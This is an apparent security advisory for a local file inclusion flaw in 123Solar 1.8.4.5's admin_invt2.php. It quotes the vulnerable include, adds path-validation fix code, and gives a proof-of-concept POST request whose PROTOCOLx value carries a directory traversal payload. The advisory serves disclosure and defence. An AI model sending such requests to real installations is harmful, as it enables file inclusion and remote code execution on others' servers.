123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just needs a web server and PHP; no database is needed. The philosophy is to keep it simple and fast, with a low footprint, so that it runs on cheap, low-powered devices.
Version 1.8.4.5 of 123Solar is affected by a Local File Inclusion (LFI) vulnerability. Attackers can manipulate the PROTOCOLx parameter to include arbitrary PHP files from unintended directories, potentially leading to remote code execution (RCE).
Details
The following code snippet from /admin/admin_invt2.php is responsible for processing the PROTOCOLx parameter:
if (!empty($_POST['PROTOCOLx']) && is_string($_POST['PROTOCOLx'])) {
    $PROTOCOLx = htmlspecialchars($_POST['PROTOCOLx'], ENT_QUOTES, 'UTF-8');
} else {
    $PROTOCOLx = 'aurora';
}
...
// Later in the code, the value of $PROTOCOLx is used to include a file:
include "../scripts/protocols/$PROTOCOLx.php";
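The PROTOCOLx parameter is intended to specify the communication protocol file name. However, the input is not sufficiently sanitized: htmlspecialchars() only encodes HTML metacharacters (&, <, > and quotes) and leaves "." and "/" untouched, so directory traversal sequences such as ../ reach the include statement unchanged. By manipulating the PROTOCOLx parameter, an attacker can therefore include arbitrary PHP files from unintended directories.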
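One way to harden the include shown above, as an added example (not 123Solar's code or its official fix): validate the name against a strict character set, canonicalise the path, and confirm the file sits in the protocols directory. The function name resolve_protocol_script, the allowed character set, and the temporary directory layout with its file names are assumptions made for the demo.

```php
<?php
// Added example, not 123Solar code. Hypothetical helper: returns the absolute
// path of the protocol script for $name, or null if the name is not a plain
// identifier or resolves outside $protocolDir.
function resolve_protocol_script(string $name, string $protocolDir): ?string
{
    // 1. Syntactic check: letters, digits, underscore and hyphen only.
    //    Rejects "/", "\", "." and NUL bytes, and therefore any "../" sequence.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() returns false for missing files.
    $base = realpath($protocolDir);
    $candidate = realpath($protocolDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    // 3. Containment check: the resolved file must sit directly in $base.
    //    realpath() has already followed symlinks, so a link pointing out of
    //    the directory fails here too.
    return dirname($candidate) === $base ? $candidate : null;
}

// Constructed demo layout: one legitimate protocol script and one file in a
// sibling config directory that must never be reachable through PROTOCOLx.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$root/scripts/protocols", 0700, true);
mkdir("$root/config", 0700, true);
file_put_contents("$root/scripts/protocols/aurora.php", "<?php // stub\n");
file_put_contents("$root/config/demo_settings.php", "<?php // stub\n");

// Constructed inputs: a valid name, a traversal attempt, a name with an
// extension, and a syntactically valid name with no matching file.
$inputs = ['aurora', '../../config/demo_settings', 'aurora.php', 'missing'];
foreach ($inputs as $input) {
    $path = resolve_protocol_script($input, "$root/scripts/protocols");
    printf("%-28s => %s\n", $input, $path === null ? 'rejected' : "include $path");
}

// In the admin page the caller would replace the original include with:
//   $script = resolve_protocol_script($requested, __DIR__ . '/../scripts/protocols');
//   if ($script === null) { http_response_code(400); exit; }
//   include $script;
```

Only the first input resolves to a path; the other three are rejected before any include is reached.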
POC
POST /admin/admin_invt2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 915
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Host: your-ip
Connection: Keep-alive
ADRx=2&ARRAY1_POWERx=2300&ARRAY2_POWERx=2300&ARRAY3_POWERx=0&ARRAY4_POWERx=0&AWPOOLINGx=5&COMOPTIONx=-Y3&CORRECTFACTORx=1&DIGESTMAILx=30&EMAILx=testing%40example.com&EXPECTAPRx=420&EXPECTAUGx=415&EXPECTDECx=60.5&EXPECTFEBx=125&EXPECTJANx=72.5&EXPECTJUIx=497&EXPECTJUNx=495&EXPECTMARx=288&EXPECTMAYx=484&EXPECTNOVx=89&EXPECTOCTx=199&EXPECTSEPx=313&FILTERx=W011%2CW001%2CE011&ILEAKTx=15&INVNAMEx=East%20side&LOGCOMx=true&LOGMAWx=true&MAILWx=true&NORESPMx=true&PANELS1x=10%20Aleo%20S_18%20230W%20Orientation:%2090%C2%B0%2C%20Pente:%2045%C2%B0&PANELS2x=10%20Aleo%20S_18%20230W%20Orientation:%2090%C2%B0%2C%20Pente:%2045%C2%B0&PASSOx=9999999&PHASEx=true&PLANT_POWERx=4600&POAKEYx=1&PORTx=/dev/solar&POUKEYx=qeNtfPNC&PROTOCOLx=../../config/[filename]&SENDALARMSx=true&SENDMSGSx=true&SKIPMONITORINGx=1&SRx=1&SYNCx=true&TLGRCIDx=1&TLGRTOKx=1&VGRIDTx=250&YINTERVALx=1000&YMAXx=4500&bntsubmit=Test%20communication&invt_numx=1
Impact
The impact of this vulnerability is primarily the ability to include and execute PHP files on the server. Possible attack scenarios include:
An attacker uploads a PHP file to another system and obtains its absolute path but cannot directly access it. The attacker can then execute the PHP file through this vulnerability.
A PHP code injection vulnerability is discovered, but the configuration file cannot be directly accessed. The attacker can execute the PHP code through this vulnerability.